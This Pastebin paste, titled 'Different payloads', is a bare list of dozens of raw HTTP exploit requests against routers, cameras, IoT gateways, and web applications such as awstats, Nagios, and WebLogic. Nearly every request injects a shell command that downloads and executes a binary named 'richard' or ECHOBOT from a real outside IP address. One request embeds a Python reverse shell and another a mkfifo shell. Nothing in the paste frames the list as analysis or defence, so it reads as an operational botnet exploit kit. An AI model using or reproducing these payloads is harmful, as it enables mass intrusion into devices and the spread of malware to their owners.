Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Different payloads:
- POST /portal/apis/aggrecate_js.cgi?script=launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22 HTTP/1.1
- Content-Length: 630
- Accept-Encoding: gzip, deflate
- Accept: /
- User-Agent: Hello-World
- Connection: keep-alive
- POST /stainfo.cgi?ifname=eth0;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
- GET /cgi-bin/masterCGI?ping=nomip&user=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
- GET /cgi-bin/script?cd /tmp;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
- GET /Main_Analysis_Content.asp?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=www.target.com&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&applyFlag=1&preferred_lang=EN&firmver=1.1.2.3_345-g987b580&cmdMethod=ping&destIP=%60uwget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60&pingCNT=5 HTTP/1.1
- Host: 192.168.0.1:80
- Connection: keep-alive
- Pragma: no-cache
- Cache-Control: no-cache
- Upgrade-Insecure-Requests: 1
- Connection: keep-alive
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
- Referer: http://www.target.com/Main_Analysis_Content.asp
- Accept-Encoding: gzip, deflate
- Accept-Language: en-US,en;q=0.9
- GET /apply.cgi?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=192.168.1.1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ping+-c+5+%3B+ls+-l&firmver=3.0.0.4&cmdMethod=ping&destIP=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&pingCNT=5 HTTP/1.1
- Host: 192.168.1.1:80
- Proxy-Connection: keep-alive
- Authorization: Basic ZGVmYXVsdA==
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36
- Referer: http://192.168.1.1/Main_Analysis_Content.asp
- Accept-Encoding: gzip,deflate,sdch
- Accept-Language: en-US,en;q=0.8
- GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;echo%20YYY;').exit().%24a[ HTTP/1.1
- sort=].phpinfo().exit().$a[
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- Connection: Close
- GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;echo%20YYY;echo| HTTP/1.1
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- Connection: Close
- GET /cgi-bin/awstats.pl?migrate=|echo;echo%20YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;echo%20YYY;echo|awstats HTTP/1.1
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- Connection: Close
- GET /cgi-bin/img.pl HTTP/1.1
- f=etc/hosts
- f=%Q!bin/sh -c echo 'YYY';wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; echo 'YYY'|!
- POST /upnpisapi?uuid:+urn:beckhoff.com:serviceId:cxconfig HTTP/1.1
- User-Agent: Hello-World
- Host: 192.168.0.1:5120
- Content-type: text/xml; charset=utf-8
- SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write
- M-SEARCH * HTTP/1.1
- HOST: 239.255.255.250:1900
- MAN: ssdp:discover
- MX: 3
- ST: upnp:rootdevice
- <?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup><IndexOffset>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</IndexOffset><pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>
- POST /upnp/control/basicevent1 HTTP/1.1
- Host: %s:49152
- Connection: keep-alive
- Accept-Encoding: gzip, deflate Accept: */*
- User-Agent: python-requests/2.18.4
- SOAPAction: urn:Belkin:service:basicevent:1#SetSmartDevInfo
- Content-Length: 393
- <?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:Body><u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1"> <SmartDevURL>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/ECHOBOT; chmod +x /tmp/ECHOBOT; /tmp/ECHOBOT</SmartDevURL> </u:SetSmartDevInfo> </s:Body> </s:Envelope>
- GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
- Authorization: Basic YWRtaW46YWRtaW4=
- Server: Boa/0.94.14rc21
- Accept-Ranges: bytes
- Connection: close
- Content-type: text/plain
- POST /cgi-bin/file_transfer.cgi HTTP/1.1
- Content-Type: application/x-www-form-urlencoded
- file_transfer=new&dir='Pa_Notewget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richardPa_Note
- POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % 99999 cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
- 'SSL_CLIENT_VERIFY' : 'SUCCESS'
- get_package_fil:
- site_name: 'blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_0';#,appliance_type: primary,package_type: active
- User-Agent: Hello-World
- Connection: keep-alive
- <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
- POST /web/cgi-bin/usbinteract.cgi HTTP/1.1
- Host: 192.168.0.1:9000
- Content-Length: 155
- Content-Type: application/x-www-form-urlencoded
- action=7&path="|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard||
- POST /dogfood/mail/spell.php HTTP/1.1
- data=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
- POST /apps/a3/cfg_ethping.cgi HTTP/1.1
- MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%26
- POST /cgi-bin/;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/ECHOBOT; chmod +x /tmp/ECHOBOT; /tmp/ECHOBOT HTTP/1.1
- POST /service/krashrpt.php HTTP/1.1
- Host: 192.168.0.1:80
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept: /
- User-Agent: Hello-World
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Cookie: kboxid=r8cnb8r3otq27vd14j7e0ahj24
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 37
- kuid=id | wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
- POST /soap.cgi?service=WANIPConn1 HTTP/1.1
- Content-Length: 649
- Host: 10.8.28.133:49152
- Content-Type: text/xml
- SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
- <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription></NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>
- POST /webadmin/script?command=|wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
- Content-Length: 630
- Accept-Encoding: gzip, deflate
- Accept: /
- User-Agent: Hello-World
- Connection: keep-alive
- GET /recordings/misc/callme_page.php?action=c&callmenum=@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%0D%0A%0D%0A HTTP/1.1
- GET /cgi-bin/webcm HTTP/1.1
- var:lang&cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
- POST /uapi-cgi/viewer/admin/testaction.cgi?&type=ip&ip=eth0%20wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard|ping%20-c%203%201.1.1.1|x HTTP/1.1
- Content-Length: 630
- Accept-Encoding: gzip, deflate
- Accept: /
- User-Agent: Hello-World
- Connection: keep-alive
- GET /api/project/repo/log/graph/%60wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60 HTTP/1.1
- POST /api/backup/logout.cgi?sid=aa HTTP/1.1
- Content-type: text/html
- wget+http://185.164.72.155/richard+-O+/tmp/ECHOBOT; chmod +x /tmp/ECHOBOT; /bin/tclsh+/tmp/ECHOBOT
- POST /protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
- Content-Length: 630
- Accept-Encoding: gzip, deflate
- Accept: /
- User-Agent: Hello-World
- Connection: keep-alive
- POST /html/SetSmarcardSettings.php HTTP/1.1
- Content-Length: 11660
- Content-Type: application/x-www-form-urlencoded
- Connection: close
- X-Powered-By: PHP/5.5.13
- User-Agent: joxypoxy/7.2.6
- HidChannelID=2&HidcmbBook=0&cmbBook=0|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08
- GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard aux&message= HTTP/1.1
- Host: 192.168.1.1:80
- Authorization: Basic YWRtaW46YWRtaW4=
- GET /awcuser/cgi-bin/vcs HTTP/1.1
- xml=withXsl
- xsl=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
- GET /nagios/cgi-bin/statuswml.cgi?ping=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%3Becho+%24PATH HTTP/1.1
- GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%205;%27 HTTP/1.1
- GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;%27 HTTP/1.1
- Host: 192.168.0.1:50000
- Connection: keep-alive
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
- Accept-Encoding: gzip, deflate
- Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
- Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en
- GET /scripts/rpc.php?action=updatetime×erver=||cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
- POST /op5config/welcome HTTP/1.1
- Connection: Close
- do=do=Login&password=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
- GET /monitor/op5/nacoma/command_test.php?cmd_str=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
- GET /OvCgi/connectedNodes.ovpl HTTP/1.1
- %Q!; echo YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; echo YYY| tr
- POST /_async/AsyncResponseServiceHttps HTTP/1.1
- Accept-Encoding: gzip, deflate
- Accept: */*
- Accept-Language: en
- User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
- User-Agent: Hello-World
- Connection: close
- Content-Type: text/xml
- <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService" <soapenv:Header>
- <wsa:Action>xx</wsa:Action>
- <wsa:RelatesTo>xx</wsa:RelatesTo>
- </work:WorkContext> xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
- POST /moadmin/moadmin.php HTTP/1.1
- Host: 192.168.0.1:80
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- DNT: 1
- Connection: keep-alive
- Pragma: no-cache
- Cache-Control: no-cache
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 34
- object=1;system(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard);exit
- GET /p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
- POST /parse_xml.cgi HTTP/1.1
- Content-Length:
- Content-Type: application/x-www-form-urlencoded
- filename=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
- POST /users/%2f/%2fproc%2fself%2fcomm HTTP/1.1
- Content-Type: multipart/form-data; boundary=
- <%=`wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/richard; chmod +x /tmp/richard; /tmp/richard`%>
- POST /wanipcn.xml HTTP/1.1
- Content-Length: 630
- Accept-Encoding: gzip, deflate
- SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
- Accept: /
- User-Agent: Hello-World
- Connection: keep-alive
- <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
- GET /repository/annotate?rev=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- Connection: Close
- POST /SGPAdmin/fileRequest HTTP/1.1
- &invoker=&title=¶ms=&id=&cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&source=&query=
- GET /goform/formSysCmd HTTP/1.1
- ('<textarea rows="15" name="msg" cols="80" wrap="virtual">')
- ('</textarea>')
- {'sysCmd': cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
- POST cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;&ping_count=1&action=Apply&html_view=ping HTTP/1.1
- GET /?search[send][]=eval&search[send][]=Kernel.fork%20do%60wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60end HTTP/1.1
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
- Connection: Close
- GET /qsrserver/device/getThumbnail?sourceUri=
- +-;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f+|+/bin/sh+-i+2>&1+|+;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/f; chmod 777 /tmp/f; /tmp/f; >/tmp/f ;&targetUri=/tmp/thumb/test.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&=1537275717150 HTTP/1.1
- Content-Length: 630
- Accept-Encoding: gzip, deflate
- User-Agent: Hello-World
- Host: 192.168.0.1:9080
- Connection: keep-alive
- POST /page/maintenance/lanSettings/dns HTTP/1.1
- Host: 192.168.0.1:80
- Content-Length: 64
- Accept: */*
- Origin: http://192.168.0.1
- X-Requested-With: XMLHttpRequest
- User-Agent: Testingus/1.0
- Content-Type: application/x-www-form-urlencoded
- Referer: http://192.168.0.1/maintenance
- Accept-Language: en-US,en;q=0.8,mk;q=0.6
- Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
- Connection: close
- dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60
- POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1
- Host: 192.168.0.1
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
- Accept: /
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Connection: close
- Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 86
- op=export&language=english&interval=1&object_id=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
- POST /upnp/control/hag HTTP/1.1
- Host: %s:49451
- Accept: text/javascript, text/html, application/xml, text/xml, */*
- Accept-Language: en-us,en;q=0.5
- Accept-Encoding: gzip, deflate
- X-Requested-With: XMLHttpRequest
- X-Prototype-Version: 1.7
- Content-Type: text/xml;charset=UTF-8
- MIME-Version: 1.0
- Content-Length: 311
- Connection: keep-alive
- Pragma: no-cache
- SOAPAction: urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua
- <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)</Code> </u:RunLua></s:Body></s:Envelope>
- POST /scripts/ajaxPortal.lua HTTP/1.1
- User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
- Accept: application/json, text/javascript, */*; q=0.01
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: https://www.vmware.com
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- X-Requested-With: XMLHttpRequest
- Cookie: culture=en-us
- Connection: close
- destination=8.8.8.8$(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic
- destination=8.8.8.8$(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)&source=192.168.0.1&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagnostic
- POST /cgi-bin/rdfs.cgi HTTP/1.1
- Host: 192.168.0.1:80
- application/x-www-form-urlencoded
- Content-Length: 1024
- Client=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;&Download=submit
- GET /system.ini?loginuse&loginpas HTTP/1.1
- GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://185.164.72.155/richard; chmod+777+/tmp/richard; /tmp/richard+goahead)&dir=/&mode=PORT&upload_interval=0
- GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s
- GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0
- POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
- Host: 10.0.0.1:80
- User-Agent:
- Accept: application/json, text/javascript, */*; q=0.01
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- X-Requested-With: XMLHttpRequest
- Referer: http://10.0.0.1/network_diagnostic_tools.php
- Content-Length: 91
- Cookie: PHPSESSID=; auth=
- DNT: 1
- X-Forwarded-For: 8.8.8.8
- Connection: keep-alive
- test_connectivity=true&destination_address=www.comcast.net || cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; &count1=4
- POST /cgi-bin/cgiServer.exx HTTP/1.1
- Host: 10.0.75.122:80
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Authorization: Basic YWRtaW46YWRtaW4=
- Connection: keep-alive
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 0
- system(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)
- GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;%22 HTTP/1.1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement